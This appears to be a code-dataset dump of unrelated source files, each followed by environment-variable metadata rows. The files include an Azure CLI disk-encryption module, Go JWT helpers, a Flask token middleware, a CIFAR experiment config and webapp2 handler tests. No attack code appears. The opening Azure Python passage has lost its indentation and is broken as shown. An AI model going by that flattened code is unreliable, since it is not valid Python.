# The following logic was mostly ported from xplat-cli
os_type = 'Linux' if is_linux else 'Windows'
encryption_status['osType'] = os_type
extension = vm_extension_info[os_type]
extension_result = compute_client.virtual_machine_extensions.get(resource_group_name,
vm_name,
extension['name'],
'instanceView')
logger.debug(extension_result)
if extension_result.instance_view and extension_result.instance_view.statuses:
encryption_status['progressMessage'] = extension_result.instance_view.statuses[0].message
substatus_message = None
if getattr(extension_result.instance_view, 'substatuses', None):
substatus_message = extension_result.instance_view.substatuses[0].message
encryption_status['osDiskEncryptionSettings'] = vm.storage_profile.os_disk.encryption_settings
import json
if is_linux:
try:
message_object = json.loads(substatus_message)
except Exception: # pylint: disable=broad-except
message_object = None # might be from outdated extension
if message_object and ('os' in message_object):
encryption_status['osDisk'] = message_object['os']
else:
encryption_status['osDisk'] = 'Unknown'
if message_object and 'data' in message_object:
encryption_status['dataDisk'] = message_object['data']
else:
encryption_status['dataDisk'] = 'Unknown'
else:
# Windows - get os and data volume encryption state from the vm model
if (encryption_status['osDiskEncryptionSettings'] and
encryption_status['osDiskEncryptionSettings'].enabled and
encryption_status['osDiskEncryptionSettings'].disk_encryption_key and
encryption_status['osDiskEncryptionSettings'].disk_encryption_key.secret_url):
encryption_status['osDisk'] = _STATUS_ENCRYPTED
else:
encryption_status['osDisk'] = 'Unknown'
if extension_result.provisioning_state == 'Succeeded':
volume_type = extension_result.settings.get('VolumeType', None)
about_data_disk = not volume_type or volume_type.lower() != 'os'
if about_data_disk and extension_result.settings.get('EncryptionOperation', None) == 'EnableEncryption':
encryption_status['dataDisk'] = _STATUS_ENCRYPTED
return encryption_status
def _get_keyvault_key_url(cli_ctx, keyvault_name, key_name):
client = create_keyvault_data_plane_client(cli_ctx)
result = client.get_key(get_key_vault_base_url(cli_ctx, keyvault_name), key_name, '')
return result.key.kid # pylint: disable=no-member
def _handles_default_volume_type_for_vmss_encryption(is_linux, volume_type, force):
if is_linux:
volume_type = volume_type or _DATA_VOLUME_TYPE
if volume_type != _DATA_VOLUME_TYPE:
            msg = 'OS disk encryption is not yet supported for Linux VM scale sets'
if force:
logger.warning(msg)
else:
from knack.util import CLIError
raise CLIError(msg)
else:
volume_type = volume_type or _ALL_VOLUME_TYPE
return volume_type
def encrypt_vmss(cmd, resource_group_name, vmss_name, # pylint: disable=too-many-locals, too-many-statements
disk_encryption_keyvault,
key_encryption_keyvault=None,
key_encryption_key=None,
key_encryption_algorithm='RSA-OAEP',
volume_type=None,
force=False):
from msrestazure.tools import parse_resource_id
# pylint: disable=no-member
UpgradeMode, VirtualMachineScaleSetExtension, VirtualMachineScaleSetExtensionProfile = cmd.get_models(
'UpgradeMode', 'VirtualMachineScaleSetExtension', 'VirtualMachineScaleSetExtensionProfile')
compute_client = _compute_client_factory(cmd.cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(resource_group_name, vmss_name)
is_linux = _is_linux_os(vmss.virtual_machine_profile)
extension = vm_extension_info['Linux' if is_linux else 'Windows']
# 1. First validate arguments
volume_type = _handles_default_volume_type_for_vmss_encryption(is_linux, volume_type, force)
# retrieve keyvault details
disk_encryption_keyvault_url = get_key_vault_base_url(cmd.cli_ctx,
(parse_resource_id(disk_encryption_keyvault))['name'])
# disk encryption key itself can be further protected, so let us verify
if key_encryption_key:
key_encryption_keyvault = key_encryption_keyvault or disk_encryption_keyvault
# to avoid bad server errors, ensure the vault has the right configurations
_verify_keyvault_good_for_encryption(cmd.cli_ctx, disk_encryption_keyvault, key_encryption_keyvault, vmss, force)
# if key name and not key url, get url.
if key_encryption_key and '://' not in key_encryption_key:
key_encryption_key = _get_keyvault_key_url(
cmd.cli_ctx, (parse_resource_id(key_encryption_keyvault))['name'], key_encryption_key)
# 2. we are ready to provision/update the disk encryption extensions
public_config = {
'KeyVaultURL': disk_encryption_keyvault_url,
'KeyEncryptionKeyURL': key_encryption_key or '',
"KeyVaultResourceId": disk_encryption_keyvault,
"KekVaultResourceId": key_encryption_keyvault if key_encryption_key else '',
'KeyEncryptionAlgorithm': key_encryption_algorithm if key_encryption_key else '',
'VolumeType': volume_type,
'EncryptionOperation': 'EnableEncryption'
}
ext = VirtualMachineScaleSetExtension(name=extension['name'],
publisher=extension['publisher'],
type1=extension['name'],
type_handler_version=extension['version'],
settings=public_config,
auto_upgrade_minor_version=True,
force_update_tag=uuid.uuid4())
exts = [ext]
# remove any old ade extensions set by this command and add the new one.
vmss_ext_profile = vmss.virtual_machine_profile.extension_profile
if vmss_ext_profile and vmss_ext_profile.extensions:
exts.extend(old_ext for old_ext in vmss.virtual_machine_profile.extension_profile.extensions
if old_ext.type != ext.type or old_ext.name != ext.name)
vmss.virtual_machine_profile.extension_profile = VirtualMachineScaleSetExtensionProfile(extensions=exts)
# Avoid unnecessary permission error
vmss.virtual_machine_profile.storage_profile.image_reference = None
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name, vmss_name, vmss)
LongRunningOperation(cmd.cli_ctx)(poller)
_show_post_action_message(resource_group_name, vmss.name, vmss.upgrade_policy.mode == UpgradeMode.manual, True)
def decrypt_vmss(cmd, resource_group_name, vmss_name, volume_type=None, force=False):
UpgradeMode, VirtualMachineScaleSetExtension = cmd.get_models('UpgradeMode', 'VirtualMachineScaleSetExtension')
compute_client = _compute_client_factory(cmd.cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(resource_group_name, vmss_name)
is_linux = _is_linux_os(vmss.virtual_machine_profile)
extension = vm_extension_info['Linux' if is_linux else 'Windows']
# 1. be nice, figure out the default volume type
volume_type = _handles_default_volume_type_for_vmss_encryption(is_linux, volume_type, force)
# 2. update the disk encryption extension
public_config = {
'VolumeType': volume_type,
'EncryptionOperation': 'DisableEncryption',
}
ext = VirtualMachineScaleSetExtension(name=extension['name'],
publisher=extension['publisher'],
type1=extension['name'],
type_handler_version=extension['version'],
settings=public_config,
auto_upgrade_minor_version=True,
force_update_tag=uuid.uuid4())
if (not vmss.virtual_machine_profile.extension_profile or
not vmss.virtual_machine_profile.extension_profile.extensions):
extensions = []
else:
extensions = vmss.virtual_machine_profile.extension_profile.extensions
ade_extension = [x for x in extensions if
x.type1.lower() == extension['name'].lower() and x.publisher.lower() == extension['publisher'].lower()] # pylint: disable=line-too-long
if not ade_extension:
from knack.util import CLIError
raise CLIError("VM scale set '{}' was not encrypted".format(vmss_name))
index = vmss.virtual_machine_profile.extension_profile.extensions.index(ade_extension[0])
vmss.virtual_machine_profile.extension_profile.extensions[index] = ext
# Avoid unnecessary permission error
vmss.virtual_machine_profile.storage_profile.image_reference = None
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name, vmss_name, vmss)
LongRunningOperation(cmd.cli_ctx)(poller)
_show_post_action_message(resource_group_name, vmss.name, vmss.upgrade_policy.mode == UpgradeMode.manual, False)
def _show_post_action_message(resource_group_name, vmss_name, manual_mode, enable):
    msg = ''
    if manual_mode:
msg = ("With manual upgrade mode, you will need to run 'az vmss update-instances -g {} -n {} "
"--instance-ids \"*\"' to propagate the change.\n".format(resource_group_name, vmss_name))
msg += ("Note, {} encryption will take a while to finish. Please query the status using "
"'az vmss encryption show -g {} -n {}'. For Linux VM, you will lose the access during the period".format(
'enabling' if enable else 'disabling', resource_group_name, vmss_name))
logger.warning(msg)
def show_vmss_encryption_status(cmd, resource_group_name, vmss_name):
client = _compute_client_factory(cmd.cli_ctx)
vm_instances = list(client.virtual_machine_scale_set_vms.list(resource_group_name, vmss_name,
select='instanceView', expand='instanceView'))
result = []
for instance in vm_instances:
view = instance.instance_view
disk_infos = []
vm_enc_info = {
'id': instance.id,
'disks': disk_infos
}
for div in view.disks:
disk_infos.append({
'name': div.name,
'encryptionSettings': div.encryption_settings,
'statuses': [x for x in (div.statuses or []) if (x.code or '').startswith('EncryptionState')]
})
result.append(vm_enc_info)
return result
def _verify_keyvault_good_for_encryption(cli_ctx, disk_vault_id, kek_vault_id, vm_or_vmss, force):
def _report_client_side_validation_error(msg):
if force:
logger.warning("WARNING: %s %s", msg, "Encryption might fail.")
else:
from knack.util import CLIError
raise CLIError("ERROR: {}".format(msg))
resource_type = "VMSS" if vm_or_vmss.type.lower().endswith("virtualmachinescalesets") else "VM"
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_KEYVAULT).vaults
disk_vault_resource_info = parse_resource_id(disk_vault_id)
key_vault = client.get(disk_vault_resource_info['resource_group'], disk_vault_resource_info['name'])
# ensure vault has 'EnabledForDiskEncryption' permission
if not key_vault.properties or not key_vault.properties.enabled_for_disk_encryption:
_report_client_side_validation_error("Keyvault '{}' is not enabled for disk encryption.".format(
disk_vault_resource_info['resource_name']))
if kek_vault_id:
kek_vault_info = parse_resource_id(kek_vault_id)
if disk_vault_resource_info['name'].lower() != kek_vault_info['name'].lower():
client.get(kek_vault_info['resource_group'], kek_vault_info['name'])
    # verify the subscription matches
vm_vmss_resource_info = parse_resource_id(vm_or_vmss.id)
if vm_vmss_resource_info['subscription'].lower() != disk_vault_resource_info['subscription'].lower():
_report_client_side_validation_error("{} {}'s subscription does not match keyvault's subscription."
.format(resource_type, vm_vmss_resource_info['name']))
# verify region matches
if key_vault.location.replace(' ', '').lower() != vm_or_vmss.location.replace(' ', '').lower():
_report_client_side_validation_error(
"{} {}'s region does not match keyvault's region.".format(resource_type, vm_vmss_resource_info['name']))
|
[] |
[] |
[
"ADE_TEST_EXTENSION_PUBLISHER",
"ADE_TEST_EXTENSION_NAME"
] |
[]
|
["ADE_TEST_EXTENSION_PUBLISHER", "ADE_TEST_EXTENSION_NAME"]
|
python
| 2 | 0 | |
examples/examples_test.go
|
// Copyright 2016-2017, Pulumi Corporation. All rights reserved.
package examples
import (
"os"
"testing"
"github.com/pulumi/pulumi/pkg/v3/testing/integration"
)
func checkAuthUrl(t *testing.T) {
authUrl := os.Getenv("OS_AUTH_URL")
if authUrl == "" {
t.Skipf("Skipping test due to missing OS_AUTH_URL environment variable")
}
}
func getCwd(t *testing.T) string {
cwd, err := os.Getwd()
if err != nil {
t.FailNow()
}
return cwd
}
func getBaseOptions() integration.ProgramTestOptions {
return integration.ProgramTestOptions{
// One change is known to occur during refresh of the resources in this example:
// `~ openstack:compute:Instance test updated changes: + blockDevices,personalities,schedulerHints``
ExpectRefreshChanges: true,
}
}
|
[
"\"OS_AUTH_URL\""
] |
[] |
[
"OS_AUTH_URL"
] |
[]
|
["OS_AUTH_URL"]
|
go
| 1 | 0 | |
tests/bugs/core_4899_test.py
|
#coding:utf-8
#
# id: bugs.core_4899
# title: GFIX -online: message "IProvider::attachDatabase failed when loading mapping cache" appears in Classic (only) if access uses remote protocol
# decription:
#
# tracker_id: CORE-4899
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('^((?!Attributes).)*$', ''), ('[\t]+', ' ')]
init_script_1 = """"""
db_1 = db_factory(page_size=4096, sql_dialect=3, init=init_script_1)
# test_script_1
#---
#
# import os
#
# os.environ["ISC_USER"] = user_name
# os.environ["ISC_PASSWORD"] = user_password
#
# db_conn.close()
#
# fdb='$(DATABASE_LOCATION)bugs.core_4899.fdb'
# fdx=os.path.join(context['temp_directory'],'tmp_copy_4899.fdb')
#
# if os.path.isfile(fdx):
# os.remove(fdx)
#
# script="create database 'localhost:%s';" % fdx
# runProgram('isql',['-q'],script)
# # --------------------- I ----------------
#
# #shutil.copy2( fdb, fdx )
#
# # Trying to move database to OFFLINE:
#
# runProgram('gfix',['-shut', 'full', '-force', '0', fdx])
#
# runProgram('gstat',['-h',fdx])
#
# # Trying to move database online using LOCAL protocol:
# runProgram('gfix',['-online',fdx])
#
# # gfix attachment via local protocol reflects with following lines in trace:
# # 2015-08-24T18:30:03.2580 (2516:012417E0) ATTACH_DATABASE
# # C:\\MIX\\FIREBIRD\\QA\\FBT-REPO\\TMP\\CORE4899-TMP.FDB (ATT_9, SYSDBA:NONE, NONE, <internal>)
#
# runProgram('gstat',['-h',fdx])
#
# if os.path.isfile(fdx):
# os.remove(fdx)
#
# # --------------------- II ---------------
#
# #shutil.copy2( fdb, fdx )
# runProgram('isql',['-q'],script)
#
# runProgram('gfix',['-shut', 'full', '-force', '0', fdx])
# runProgram('gstat',['-h',fdx])
#
# # Trying to move database online using REMOTE protocol:
# runProgram('gfix',['-online','localhost:'+fdx])
#
# # Note: gfix attachment via remote protocol reflects with following lines in trace:
# # 2015-08-24T18:30:03.8520 (3256:01B526A8) ATTACH_DATABASE
# # C:\\MIX\\FIREBIRD\\QA\\FBT-REPO\\TMP\\CORE4899-TMP.FDB (ATT_9, SYSDBA:NONE, NONE, TCPv4:127.0.0.1)
# # C:\\MIX\\firebird\\fb30\\gfix.exe:1448
#
# runProgram('gstat',['-h',fdx])
#
# if os.path.isfile(fdx):
# os.remove(fdx)
#
# #, 'substitutions':[('^((?!Attributes).)*$',''),('[\\s]+',' ')]
#
#
#---
#act_1 = python_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
Attributes force write, full shutdown
Attributes force write
Attributes force write, full shutdown
Attributes force write
"""
@pytest.mark.version('>=3.0')
@pytest.mark.xfail
def test_1(db_1):
pytest.fail("Test not IMPLEMENTED")
|
[] |
[] |
[
"ISC_USER",
"ISC_PASSWORD"
] |
[]
|
["ISC_USER", "ISC_PASSWORD"]
|
python
| 2 | 0 | |
auth/token.go
|
package auth
import (
"fmt"
"os"
"time"
"github.com/dgrijalva/jwt-go"
)
var jwtAudience = os.Getenv("OAUTH_AUDIENCE")
func validateToken(tokenString string) (*Auth, error) {
secretKey := os.Getenv("OAUTH_SECRET")
token, err := jwt.ParseWithClaims(tokenString, &jwtClaim{}, func(token *jwt.Token) (interface{}, error) {
return []byte(secretKey), nil
})
if err != nil {
return nil, fmt.Errorf("can not parse auth token: %w", err)
}
if !token.Valid {
return nil, fmt.Errorf("invalid token")
}
claim := token.Claims.(*jwtClaim)
err = claim.Valid()
if err != nil {
return nil, fmt.Errorf("invalid token: %w", err)
}
if !claim.VerifyAudience(jwtAudience, true) {
return nil, fmt.Errorf("invalid audience")
}
return &Auth{*claim}, nil
}
func createToken(claim *jwtClaim) (string, error) {
secretKey := os.Getenv("OAUTH_SECRET")
claim.ExpiresAt = time.Now().Add(1 * time.Hour).Unix()
claim.Audience = jwtAudience
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claim)
return token.SignedString([]byte(secretKey))
}
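// exampleRoundTrip is an illustrative sketch, not part of the original
// package: it signs an empty claim and then validates the resulting token.
// It assumes the OAUTH_SECRET and OAUTH_AUDIENCE environment variables are
// set to non-empty values before the package is initialized.
func exampleRoundTrip() (*Auth, error) {
	signed, err := createToken(&jwtClaim{})
	if err != nil {
		return nil, err
	}
	return validateToken(signed)
}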
|
[
"\"OAUTH_AUDIENCE\"",
"\"OAUTH_SECRET\"",
"\"OAUTH_SECRET\""
] |
[] |
[
"OAUTH_SECRET",
"OAUTH_AUDIENCE"
] |
[]
|
["OAUTH_SECRET", "OAUTH_AUDIENCE"]
|
go
| 2 | 0 | |
src/middleware.py
|
import os
from functools import wraps
import jwt
from flask import request
from src.response import jsonResponse
def tokenRequired(func):
"""
checks for token and decodes it
Args:
`func: (function)` -> function which needs token validated before access
Returns:
`function`
"""
@wraps(func)
def decoratedFunc(*args, **kwargs):
token = request.headers.get("x-auth-token", None)
if token is None:
return jsonResponse(status_code=401, error={"message": "token required"})
try:
decoded_token = jwt.decode(
                jwt=token, key=os.getenv("tokenKey"), algorithms=["HS256"])
uid = decoded_token["uid"]
except Exception as e:
print(e)
return jsonResponse(status_code=500, error={"message": "something went wrong try again"})
return func(*args, **kwargs, uid=uid)
return decoratedFunc
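if __name__ == "__main__":
    # Illustrative sketch only, not part of the original module: a minimal
    # Flask app wiring the decorator to a hypothetical route so the middleware
    # can be exercised directly. The route name, port and return value are
    # assumptions; only the decorator usage itself is taken from this file.
    from flask import Flask
    app = Flask(__name__)
    @app.route("/me")
    @tokenRequired
    def me(uid):
        return {"uid": uid}
    app.run(port=5000)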
|
[] |
[] |
[
"tokenKey"
] |
[]
|
["tokenKey"]
|
python
| 1 | 0 | |
internal/paths/paths.go
|
// Package paths is an internal package of twtr/cmd.
//
// It provides helpers to manipulate paths and directories.
package paths
import (
"errors"
"os"
"path/filepath"
"runtime"
"strings"
)
// tilde leader for ExpandTilde() and ContractTilde()
const tilde = "~/"
// ExpandTilde converts ~/path/to/file to /home/user/path/to/file.
func ExpandTilde(dir string) string {
// account for using tilde as a flat alias for $HOME
if dir == "~" {
dir += "/"
}
if home, err := os.UserHomeDir(); err == nil && strings.HasPrefix(dir, tilde) {
dir = filepath.Join(home, dir[len(tilde):])
}
return dir
}
// ContractTilde converts /home/user/path/to/file to ~/path/to/file.
func ContractTilde(dir string) string {
// get the user home dir and expand the tilde
if home, err := os.UserHomeDir(); err == nil && strings.HasPrefix(dir, home) {
dir = filepath.Join(tilde, dir[len(home):])
}
// account for using tilde as a flat alias for $HOME
if dir == "~" {
dir += "/"
}
return dir
}
// DataDir gets the XDG_DATA_DIR from the environment, with reasonable defaults
// for the current GOOS.
func DataDir() (dir string, err error) {
// get any XDG override value
if dir = os.Getenv("XDG_DATA_HOME"); dir != "" {
return
}
// get the home dir for later
if dir, err = os.UserHomeDir(); err != nil {
return
}
// determine the rest by GOOS
switch runtime.GOOS {
case "windows":
if dir = os.Getenv("LocalAppData"); dir == "" {
err = errors.New("%LOCALAPPDATA% is not defined")
}
case "darwin", "ios":
dir += "/Library/Application Support"
case "plan9":
dir += "/lib"
default: // to UNIX
dir += "/.local/share"
}
return
}
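// exampleDisplayDataDir is an illustrative sketch, not part of the original
// package: it resolves the data directory and contracts the user's home back
// to ~ so the result is suitable for display.
func exampleDisplayDataDir() (string, error) {
	dir, err := DataDir()
	if err != nil {
		return "", err
	}
	return ContractTilde(dir), nil
}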
|
[
"\"XDG_DATA_HOME\"",
"\"LocalAppData\""
] |
[] |
[
"LocalAppData",
"XDG_DATA_HOME"
] |
[]
|
["LocalAppData", "XDG_DATA_HOME"]
|
go
| 2 | 0 | |
scifar10_exp/config_naive.py
|
import importlib
import os
from collections import OrderedDict
import numpy as np
from PIL import Image
from torchvision.transforms import transforms
model_config = OrderedDict([
('arch', 'lenet5'),
('n_classes', 10),
('input_shape', (3, 32, 32)),
])
data_config = OrderedDict([
('dataset', 'SplitCIFAR10'),
('valid', 0.0),
('num_workers', 4),
('train_transform', transforms.Compose([
lambda x: Image.fromarray(x.reshape((3, 32, 32)).transpose((1, 2, 0))),
transforms.ToTensor(),
transforms.Normalize(np.array([0.5]), np.array([0.5]))])),
('test_transform', transforms.Compose([
lambda x: Image.fromarray(x.reshape((3, 32, 32)).transpose((1, 2, 0))),
transforms.ToTensor(),
transforms.Normalize(np.array([0.5]), np.array([0.5]))
]))
])
run_config = OrderedDict([
('experiment', 'run'), # This configuration will be executed by run.py
('device', 'cuda'),
('tasks', [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]), # , [4, 5], [6, 7], [8, 9]
('seed', 1234),
])
log_config = OrderedDict([
('wandb', True),
('wandb_name', 'naive'),
('print', True),
('images', True), # Save the distilled images
])
param_config = OrderedDict([
    ('no_steps', 40), # Training epochs performed by the model on the distilled dataset
    ('steps', 'minibatch'), # epoch or minibatch
    ('meta_lr', 0.1), # Learning rate for distilling images
('model_lr', 0.05), # Base learning rate for the model
('lr_lr', 0.0), # Learning rate for the lrs of the model at each optimization step
('outer_steps', 0), # Distillation epochs
('inner_steps', 0), # Optimization steps of the model
('batch_size', 1024), # Minibatch size used during distillation
('distill_batch_size', 128),
('buffer_size', 0), # Number of examples per class kept in the buffer
])
config = OrderedDict([
('model_config', model_config),
('param_config', param_config),
('data_config', data_config),
('run_config', run_config),
('log_config', log_config),
])
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
experiment = importlib.import_module(config['run_config']['experiment'])
experiment.run(config)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
tests/handler_test.py
|
# -*- coding: utf-8 -*-
# Copyright 2011 webapp2 AUTHORS.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for webapp2 webapp2.RequestHandler
"""
import os
import sys
import unittest
from six.moves.urllib.parse import unquote_plus
from tests.test_base import BaseTestCase
import webapp2
try:
import mock
except ImportError:
from unittest import mock
class BareHandler(object):
def __init__(self, request, response):
self.response = response
response.write('I am not a RequestHandler but I work.')
def dispatch(self):
return self.response
class HomeHandler(webapp2.RequestHandler):
def get(self, **kwargs):
self.response.out.write('home sweet home')
def post(self, **kwargs):
self.response.out.write('home sweet home - POST')
class MethodsHandler(HomeHandler):
def put(self, **kwargs):
self.response.out.write('home sweet home - PUT')
def delete(self, **kwargs):
self.response.out.write('home sweet home - DELETE')
def head(self, **kwargs):
self.response.out.write('home sweet home - HEAD')
def trace(self, **kwargs):
self.response.out.write('home sweet home - TRACE')
def options(self, **kwargs):
self.response.out.write('home sweet home - OPTIONS')
class RedirectToHandler(webapp2.RequestHandler):
def get(self, **kwargs):
return self.redirect_to(
'route-test',
_fragment='my-anchor',
year='2010',
month='07',
name='test',
foo='bar'
)
class RedirectAbortHandler(webapp2.RequestHandler):
def get(self, **kwargs):
self.response.headers.add_header('Set-Cookie', 'a=b')
self.redirect('/somewhere', abort=True)
class BrokenHandler(webapp2.RequestHandler):
def get(self, **kwargs):
raise ValueError('booo!')
class BrokenButFixedHandler(BrokenHandler):
def handle_exception(self, exception, debug_mode):
# Let's fix it.
self.response.set_status(200)
self.response.out.write('that was close!')
def handle_404(request, response, exception):
response.out.write('404 custom handler')
response.set_status(404)
def handle_405(request, response, exception):
response.out.write('405 custom handler')
response.set_status(405, 'Custom Error Message')
response.headers['Allow'] = 'GET'
def handle_500(request, response, exception):
response.out.write('500 custom handler')
response.set_status(500)
class PositionalHandler(webapp2.RequestHandler):
def get(self, month, day, slug=None):
self.response.out.write('%s:%s:%s' % (month, day, slug))
class HandlerWithError(webapp2.RequestHandler):
def get(self, **kwargs):
self.response.out.write('bla bla bla bla bla bla')
self.error(403)
class InitializeHandler(webapp2.RequestHandler):
def __init__(self):
pass
def get(self):
self.response.out.write('Request method: %s' % self.request.method)
class WebDavHandler(webapp2.RequestHandler):
def version_control(self):
self.response.out.write('Method: VERSION-CONTROL')
def unlock(self):
self.response.out.write('Method: UNLOCK')
def propfind(self):
self.response.out.write('Method: PROPFIND')
class AuthorizationHandler(webapp2.RequestHandler):
def get(self):
self.response.out.write('nothing here')
class HandlerWithEscapedArg(webapp2.RequestHandler):
def get(self, name):
self.response.out.write(unquote_plus(name))
def get_redirect_url(handler, **kwargs):
return handler.uri_for('methods')
app = webapp2.WSGIApplication([
('/bare', BareHandler),
webapp2.Route('/', HomeHandler, name='home'),
webapp2.Route('/methods', MethodsHandler, name='methods'),
webapp2.Route('/broken', BrokenHandler),
webapp2.Route('/broken-but-fixed', BrokenButFixedHandler),
webapp2.Route('/<year:\d{4}>/<month:\d{1,2}>/<name>', None,
name='route-test'),
webapp2.Route('/<:\d\d>/<:\d{2}>/<:\w+>', PositionalHandler,
name='positional'),
webapp2.Route('/redirect-me', webapp2.RedirectHandler,
defaults={'_uri': '/broken'}),
webapp2.Route('/redirect-me2', webapp2.RedirectHandler,
defaults={'_uri': get_redirect_url}),
webapp2.Route('/redirect-me3', webapp2.RedirectHandler,
defaults={'_uri': '/broken', '_permanent': False}),
webapp2.Route('/redirect-me4', webapp2.RedirectHandler,
defaults={'_uri': get_redirect_url, '_permanent': False}),
webapp2.Route('/redirect-me5', RedirectToHandler),
webapp2.Route('/redirect-me6', RedirectAbortHandler),
webapp2.Route('/lazy', 'tests.resources.handlers.LazyHandler'),
webapp2.Route('/error', HandlerWithError),
webapp2.Route('/initialize', InitializeHandler),
webapp2.Route('/webdav', WebDavHandler),
webapp2.Route('/authorization', AuthorizationHandler),
webapp2.Route('/escape/<name:.*>', HandlerWithEscapedArg, 'escape'),
], debug=False)
DEFAULT_RESPONSE = """Status: 404 Not Found
content-type: text/html; charset=utf8
Content-Length: 52
404 Not Found
The resource could not be found.
"""
class TestHandler(BaseTestCase):
def tearDown(self):
super(TestHandler, self).tearDown()
app.error_handlers = {}
def test_200(self):
rsp = app.get_response('/')
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home')
def test_404(self):
req = webapp2.Request.blank('/nowhere')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 404)
def test_405(self):
req = webapp2.Request.blank('/')
req.method = 'PUT'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 405)
self.assertEqual(rsp.headers.get('Allow'), 'GET, POST')
def test_500(self):
req = webapp2.Request.blank('/broken')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_500_but_fixed(self):
req = webapp2.Request.blank('/broken-but-fixed')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'that was close!')
def test_501(self):
# 501 Not Implemented
req = webapp2.Request.blank('/methods')
req.method = 'FOOBAR'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 501)
def test_lazy_handler(self):
req = webapp2.Request.blank('/lazy')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am a laaazy view.')
def test_handler_with_error(self):
req = webapp2.Request.blank('/error')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 403)
self.assertEqual(rsp.body, b'')
def test_debug_mode(self):
app = webapp2.WSGIApplication([
webapp2.Route('/broken', BrokenHandler),
], debug=True)
req = webapp2.Request.blank('/broken')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_custom_error_handlers(self):
app.error_handlers = {
404: handle_404,
405: handle_405,
500: handle_500,
}
req = webapp2.Request.blank('/nowhere')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 404)
self.assertEqual(rsp.body, b'404 custom handler')
req = webapp2.Request.blank('/')
req.method = 'PUT'
rsp = req.get_response(app)
self.assertEqual(rsp.status, '405 Custom Error Message')
self.assertEqual(rsp.body, b'405 custom handler')
self.assertEqual(rsp.headers.get('Allow'), 'GET')
req = webapp2.Request.blank('/broken')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
self.assertEqual(rsp.body, b'500 custom handler')
def test_methods(self):
app.debug = True
req = webapp2.Request.blank('/methods')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home')
req = webapp2.Request.blank('/methods')
req.method = 'POST'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - POST')
req = webapp2.Request.blank('/methods')
req.method = 'PUT'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - PUT')
req = webapp2.Request.blank('/methods')
req.method = 'DELETE'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - DELETE')
req = webapp2.Request.blank('/methods')
req.method = 'HEAD'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'')
req = webapp2.Request.blank('/methods')
req.method = 'OPTIONS'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - OPTIONS')
req = webapp2.Request.blank('/methods')
req.method = 'TRACE'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - TRACE')
app.debug = False
def test_positional(self):
req = webapp2.Request.blank('/07/31/test')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'07:31:test')
req = webapp2.Request.blank('/10/18/wooohooo')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'10:18:wooohooo')
def test_redirect(self):
req = webapp2.Request.blank('/redirect-me')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 301)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/broken')
def test_redirect_with_callable(self):
req = webapp2.Request.blank('/redirect-me2')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 301)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/methods')
def test_redirect_not_permanent(self):
req = webapp2.Request.blank('/redirect-me3')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/broken')
def test_redirect_with_callable_not_permanent(self):
req = webapp2.Request.blank('/redirect-me4')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/methods')
def test_redirect_to(self):
req = webapp2.Request.blank('/redirect-me5')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(rsp.body, b'')
self.assertEqual(
rsp.headers['Location'],
'http://localhost/2010/07/test?foo=bar#my-anchor'
)
def test_redirect_abort(self):
req = webapp2.Request.blank('/redirect-me6')
